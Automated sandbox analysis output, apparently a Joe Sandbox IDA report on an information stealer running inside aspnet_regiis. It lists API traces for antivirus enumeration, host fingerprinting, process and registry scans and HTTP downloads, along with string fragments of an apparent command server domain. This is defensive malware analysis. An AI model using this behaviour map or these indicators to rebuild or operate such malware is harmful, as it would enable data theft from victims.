                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1956182324-0
                                                                                                                                                                    • Opcode ID: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                                                                    • Instruction ID: ea3aaa4254ea011307d5ff1151e45a3af1a32ea2cb92a891b43a4b7d07102f87
                                                                                                                                                                    • Opcode Fuzzy Hash: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                                                                    • Instruction Fuzzy Hash: E6C15D32904208AFDF15EFA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                                                                      • Part of subcall function 00410C53: RtlAllocateHeap.NTDLL(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                                                                      • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0041858F), ref: 004170DD
                                                                                                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004170EC
                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176CB
                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176E4
                                                                                                                                                                      • Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                                                                      • Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                                                                      • Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
                                                                                                                                                                      • Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2
                                                                                                                                                                      • Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                                                                      • Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                                                                      • Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
                                                                                                                                                                      • Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A
                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00417A9A
                                                                                                                                                                      • Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                                                                      • Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                                                                      • Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041858F), ref: 00417100
                                                                                                                                                                      • Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                                                                      • Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                                                                      • Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                                                                      • Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                                                                      • Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                                                                      • Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00418000
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocateConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                                                                    • String ID: .exe$.exe$_DEBUG.zip$bb7310eab4245006f125c442da2d1e50$cowod.$hopto$http://$org
                                                                                                                                                                    • API String ID: 2665860859-4208217514
                                                                                                                                                                    • Opcode ID: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                                                                    • Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
                                                                                                                                                                    • Opcode Fuzzy Hash: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                                                                    • Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B
                                                                                                                                                                    APIs
                                                                                                                                                                    • strtok_s.MSVCRT ref: 004135EA
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,true), ref: 004136AC
                                                                                                                                                                      • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                                      • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 0041376E
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00413817
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00413853
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
                                                                                                                                                                    • strtok_s.MSVCRT ref: 0041398F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                    • String ID: false$true
                                                                                                                                                                    • API String ID: 2116072422-2658103896
                                                                                                                                                                    • Opcode ID: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                                                                    • Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
                                                                                                                                                                    • Opcode Fuzzy Hash: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                                                                    • Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                      • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                      • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                                                                                                                    • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 004052C1
                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
                                                                                                                                                                    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
                                                                                                                                                                    • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
                                                                                                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00405439
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00405445
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00405451
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                    • String ID: GET$\xA
                                                                                                                                                                    • API String ID: 442264750-571280152
                                                                                                                                                                    • Opcode ID: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                                                                    • Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
                                                                                                                                                                    • Opcode Fuzzy Hash: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                                                                    • Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                                                                    • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                                                                      • Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
                                                                                                                                                                      • Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00411A8B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                    • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                    • API String ID: 4288110179-315474579
                                                                                                                                                                    • Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                                                                                    • Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
                                                                                                                                                                    • Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                                                                                    • Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68
                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 004012A7
                                                                                                                                                                    • _memset.LIBCMT ref: 004012B6
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378
                                                                                                                                                                      • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                                                                      • Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                                                                      • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 004013E3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1553874529-0
                                                                                                                                                                    • Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                                                                                    • Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
                                                                                                                                                                    • Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                                                                                    • Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                                                                                    • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                                                                    • wsprintfA.USER32 ref: 004112DD
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00411446
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00411466
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00411472
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                    • String ID: - $%s\%s$?
                                                                                                                                                                    • API String ID: 2394436309-3278919252
                                                                                                                                                                    • Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                                                                                    • Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
                                                                                                                                                                    • Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                                                                                    • Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                                                                                    • wsprintfA.USER32 ref: 00410AA7
                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6
                                                                                                                                                                      • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                                                                      • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                                                                      • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                                                                      • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00410ACD
                                                                                                                                                                      • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                                                                      • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                    • String ID: wA$:\$C$QuBi
                                                                                                                                                                    • API String ID: 1856320939-1441494722
                                                                                                                                                                    • Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                                                                                    • Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
                                                                                                                                                                    • Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                                                                                    • Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                      • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                      • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00406856
                                                                                                                                                                    • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406923
                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040692A
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00406936
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                    • String ID: <+A
                                                                                                                                                                    • API String ID: 2507841554-2778417545
                                                                                                                                                                    • Opcode ID: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
                                                                                                                                                                    • Instruction ID: 1d44a0941bf69239cbc718c5fc054d573873141a30687fa59e6c761baef87c5b
                                                                                                                                                                    • Opcode Fuzzy Hash: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
                                                                                                                                                                    • Instruction Fuzzy Hash: 22411CB1900128ABDF20DB21DD49BDA7BB9EB04315F1040B6BB09B21A1D6359E958FA9
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                                      • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                                      • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                                      • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                                      • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                                      • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                                      • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                                                                      • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
